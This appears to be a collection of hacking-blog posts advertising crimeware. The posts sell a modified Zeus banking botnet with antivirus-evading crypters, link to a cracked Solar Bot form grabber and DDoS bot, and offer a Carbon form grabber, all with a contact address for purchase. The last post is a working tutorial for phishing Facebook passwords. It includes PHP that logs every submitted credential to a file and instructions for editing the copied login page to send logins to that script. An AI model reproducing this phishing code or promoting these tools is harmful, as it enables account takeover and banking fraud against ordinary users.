Monday, January 12, 2015

Modified zeus botnet, grab 2014 version of all browser

Zeus is a notorious Trojan which infects Windows users and can retrieve confidential information from the infected computers. Once it is installed, it also download configuration files and updates from the Internet. The Zeus files are created and customised using a Trojan-building toolkit, which has been made public.

Zeus was created to steal private data from the infected systems, such as system information, passwords, banking credentials or other financial details and it can be customised to gather banking details in specific countries and by using various methods.

Using the retrieved information, Botnet owner can log into banking accounts of infected people and transfers money.

Zbot/Zeus is based on the client-server model and requires a Command and Control server to send and receive information across the network.

To counter this weak point, the latest variant of Zeus/Zbot have included a DGA (domain generation algorithm) , which makes the Command and Control servers resistant to takedown attempts. The DGA generates a list of domain names to which the bots try to connect in case the Command and Control server cannot be reached or shutdown.

This new version does not just have the features highlighted above, it has been recoded to be invisible to all trackers, it grab all new browser, specially made crypters to evade antivirus protection, you can also contact us for any features you want coded into the builder and it will be built for you.

You can comment below, bookmarks our feeds or subscribe to our mail list for latest information.

Mail us to l33tconcept@gmail.com for info and prices.

The Top 10 known banking Malware

1. Zeus, also known as Zbot, is a notorious Trojan which infects Windows users and tries to retrieve confidential information from the infected computers. Once it is installed, it also tries to download configuration files and updates from the Internet. The Zeus files are created and customised using a Trojan-building toolkit, which is available.

Zeus has been created to steal private data from the infected systems, such as system information, passwords, banking credentials or other financial details and it can be customized to gather banking details in specific countries and by using various methods.
Using the retrieved information.

Zbot/Zeus is based on the client-server model and requires a Command and Control server to send and receive information across the network. The single Command and Control server is considered to be the weak point in the malware architecture and it is the target of law enforcement agencies when dealing with Zeus.

To counter this weak point, the latest variant of Zeus/Zbot have included a DGA (domain generation algorithm) , which makes the Command and Control servers resistant to takedown attempts. The DGA generates a list of domain names to which the bots try to connect in case the Command and Control server cannot be reached.
Zeus/Zbot, known by many names including PRG and Infostealer.

2. Zeus Gameover (P2P) (Zeus family)
Zeus Gameover is a variant of the Zeus family – the infamous family of financial stealing malware – which relies upon a peer-to-peer botnet infrastructure.

The network configuration removes the need for a centralized Command and Control server, including a DGA (Domain Generation Algorithm) which produces new domains in case the peers cannot be reached . The generated peers in the botnet can act as independent Command and Control servers and are able to download commands or
configuration files between them, finally sending the stolen data to the malicious servers.

Zeus Gameover can be used to collect financial information, targeting
various user data from credentials, credit card numbers and passwords to any other private information which might prove useful in retrieving a victim’s banking information.

3. SpyEye (Zeus family)
SpyEye is a data-stealing malware (similar to Zeus) created to steal money from online bank accounts. This malicious software is capable of stealing bank account credentials, social security numbers and financial information that could be used to empty bank accounts.

This banking Trojan contains a keylogger that tries to retrieve login credentials for online
bank account. The attack toolkit is popular because it can be customised to attack specific institutions or target certain financial data.

SpyEye is able to start a financial transaction as soon as a targeted user initiates an online operation from his bank account.

4. Ice IX (Zeus family)
Ice IX is a modified variant of Zeus, the infamous banking Trojan, one of the most sophisticated pieces of financial malware out there.
This modified variant is used for the purpose of stealing personal and financial information, such as credentials or passwords for the e-mail or the online bank accounts.

Like Zeus, Ice IX can control the displayed content in a browser used for online banking websites. The injected web forms are used to extract banking credentials and other private security information.

Ice IX, the modified version of Zeus, improved a few Zeus capabilities. The most important one is a defence mechanism to evade tracker sites, which monitor at present most Command and Control servers controlled by Zeus.

5. Citadel (Zeus family)
Citadel appeared after the source code of the infamous Zeus leaked in 2011. Due to its open source character, the software code has been reviewed and improved by coders for various malware attacks.

It is an advanced toolkit which can trick users into revealing confidential information and steal banking credentials. The stolen credentials are then used into accessing online accounts and running
transactions.

6. Carberp (Zeus family)
Carberp is a Trojan designed to give attackers the ability to steal private information from online banking platforms accessed by the infected PCs.

This Trojan’s behavior is similar to the other financial malware in the Zeus family and displays stealth abilities from anti malware applications. Carberp is able to steal sensitive data from infected machines and download new data from command-and-control servers.

This Trojan is one of the most widely spread financial stealing malware in Russia. Primarily targeting banking systems and companies which perform a high number of financial transactions, Carberp is not only injecting a code into web pages, but it also tries to exploit several vulnerabilities in the target system so as to escalate to administrative privileges.
Distributed through the typical methods of using malicious e-mail attachments, drive-by downloads or by clicking on a deceptive pop-up window, what is different at this financial malware is the high number of legitimate web resources used to collect information and potentially make transactions.

7. Bugat (Zeus family)
Bugat is another banking Trojan, with similar capabilities to Zeus – the notorious data-stealing Trojan – which is used to steal financial credentials.

Bugat targets an infected user’s browsing activity and harvests information during online banking sessions. It can upload files from an infected computer, download and execute a list of running processes or steal FTP credentials.

Bugat communicates with a command and control server from where it receives instructions and updates to the list of financial websites it targets.

The collected information is sent to the remote server. It is spreads mostly by inserting malicious links in the e-mails sent to the targeted users. When a user clicks a malicious link, he is directed to a
fraudulent website where the Bugat executable downloads on the system.

8. Shylock (Zeus family)
Shylock is a banking malware, designed to retrieve user’s banking credentials.

As soon as it is installed, Shylock communicates with the remote Command and Control servers controlled by the c&c owner, sending and receiving data to and from the infected PCs.
Similar to Zeus Gameover, this malware makes use of a (DGA) Domain generation algorithm which is used to generate a number of domain names that can be used receive commands between the malicious servers and the infected systems.

The Trojan is delivered mostly through drive-by downloads on compromised websites and via malvertising , where malicious code is inserted in adverts that are then placed on legitimate websites.

Another popular method of spreading this financial malware is by inserting malicious JavaScript into a web page . This technique produces a pop-up which pushes the user to download a plugin, apparently necessary for the media display on the website.

9. Torpig (Zeus family)
Torpig is a sophisticated type of malware program designed to harvest sensitive information, such as bank account and credit card information from its victims.

The Torpig botnet – the network of compromised PCs – which are under the control of c&c owner and are the main means for sending spam e-mails or stealing private information or credentials for the online bank accounts. Torpig also uses a DGA (domain generation algorithm) to generate a list of domains names and locate the Command and Control servers used by hackers.

Users are typically infected through drive-by downloads ; a web page on a legitimate website is modified to ask the user for JavaScript code from a web location controlled by the IT criminals. The infected computers run phishing attacks to obtain sensitive data from its victims.

If you know of any malware that you think should be in the list, kindly comment below with its name and available information

Tuesday, June 10, 2014

Solar Bot Cracked +How to setup Solar Bot on Web host | Free download link

Solar Bot Cracked +How to setup Solar Bot on Web host | Free download link


Description

download link :
http://adf.ly/dOzgp
 Web host :
http://www.000webhost.com/
------------------------------------------------------
Technical Details

Coded in Lazaru Pascal
Code is fully relocatable Shellcode
Uses custom CRC32 API loader
Uses BeaEngine Disassembler for x86 and x64
Uses named pipes for inter-process communication
Multpiple layers of encryption and compression
Global Ring 3 rootkit and No own process
Fully Unicode
No dependencies Only standard system DLLs
Multiple Anti-Debug methods
Unique Server-Bot traffic encryption
Anti bot installation

Features

Internet Explorer Formgrabber
Mozilla FireFox Formgrabber
Google Chrome Formgrabber
SPDY Grabbing
FTP and POP3 Grabber
SlowLoris DDOS and SlowPost DDOS
GET Flood
UDP DDOS
Update and Download System
MD5 Verified Update and Download System
Reverse Socks 5
Browse URL Visible
Browse URLHidden


contact me for more information (l33tconcept@gmail.com)

Carbon Form Grabber BOTNET - All Browser Intrusion !



I bring to you a brand new product! This is really very cool! This form grabber was written from scratch with the customer in mind.

we have made a web panel that is very intuitive, easy to use and sleek! This product was made for new comers and for pros,
it will suit the needs of any user with our easy to use panel and our advance features, this product is the best of both worlds. 

 The Carbon Form Grabber created by AlexHF runs on 32-bit and 64-bit platforms and exhibits some semi-persistence.  the Carbon Grabber is composed of a Builder and an intuitive PHP Panel.
The Carbon Grabber is able to capture logins and passwords from SSL & HTTP webpages in Chrome, Firefox and Internet Explorer.
The kit contains the following features :


    Startup (Hidden) - Meaning the process doesn’t appear in the Windows Task Manager.
    Userkit (x86 & x64 )
    Injection
    Chrome SSL & HTTP Grabber
    Firefox SSL & HTTP Grabber
    Internet Explorer SSL & HTTP Grabber
    Intuitive PHP Panel
    Escalate to Administrator Privileges - Apparently performed via runas

Features

* Startup ( Hidden)
* Userkit(x86 & x64 )
* Injection
* Chrome SSL & HTTP Grabber
* Firefox SSL & HTTP Grabber
* Internet Explorer SSL & HTTP Grabber
* Intuitive PHP Panel
* Escalate to Administrator Privileges.


Contact Horlla on gmail for SETUP files or SETUPS - gmail ID- l33tconcept@gmail.com

Wednesday, June 4, 2014

How to change file extension on a windows computer

In my previous tutorial, i said am going to write a tutorial on how to change a file extension on a windows computer, changing a file extension is very simple and anyone should be able to do it if you follow the steps below properly.

According to the previous, we want to change the extension of our txt document to html, so i want you to follow the steps below to get it done.

1. Know which document you want to be able to change the file extension of.

Make a copy of this file and save it as another name so you will still be able to open the original in your word processing program.

Close the word processing program. You will work with the copied file from here on.

2. Select the "Start" button on the bottom left of your screen. Click your mouse to bring up the control panel. See the right side of the new screen.

Select "Appearance and Personalization."
Now, select "Folder Options," and then the "View" tab.
Go down the list until you find "Hide extensions for known file types." Uncheck that box.
Click on "Apply" and close the control options boxes.

3. Reopen the directory where the file is located.
Place your cursor on the file copy you just made. Right-click the file, making sure not to use a shortcut file.
Select "Rename" from the options they give you.
Change the extension manually by retyping the new program extension you want to use. Type .html if changing to HTML code and make it .txt if you want it to be a text file.
Move this file to the appropriate directory if you need to.

4. Understand the file has not undergone any new formatting as a result of this name change. It will open only if the desired program accepts it.

Otherwise, you may have to simply use copied text and graphics from the original document into a blank documents created in the new program. This workaround does not work on music files, but is great for newsletter articles in HTML code or a desktop publishing program.

You may have to change the word processing file into a text file (extension will be .txt) in some instances before saving it into the desktop publishing or .html file.

Sunday, June 1, 2014

Hack a friend facebook account (THE EASY WAY)

How to hack people Facebook account

what you need
a web-hosting, a php web shell and a brain.

browse to facebook.com login page in your browser, when the page finish loading, right click on anywhere on the page and click on "view page source", it will show the source code of the page, copy all the codes and paste them in a new notepad, name the notepad "login", then open a new folder on your computer Desktop and name it facebook, move the text document named login to the newly created folder, create another text document and name it "phish" and copy and paste the following code inside and save it

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

create another text document in the same folder and name it "log.txt" and leave it blank.
 After that open the notepad with the source code and press CONTROL + F "CTRL + F" key on your keyboard, it will show a small dialogue box where you can search for anything in the document, type "action=" without the quote and click find next till you find the action keyword that has something with login, in the case of facebook it will be something like the text below,

><form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"

replace the "https://www.facebook.com/login.php?login_attempt=1 it with" "phish.php" without quote so that it will look like the code below

><form id="login_form" action="phish.php"

then save it, so you will now have a document in the folder name facebook, so its time to rename the login.txt document to login.htm.

NOTE: if after renaming the text document to login.html it icon does not change to either chrome of firefox or the icon of any browser installed on your computer, and it appear to be something like login.html.txt, that means you need to changes to how your computer manage system file extension, you can comment below and i will get back to you or made my next tutorial on how to change file extension

If you are successful with all the steps above then you can continue to upload the folder to your web hosting or your shelled website. then share the link with as many people as possible, check the log.txt document for results.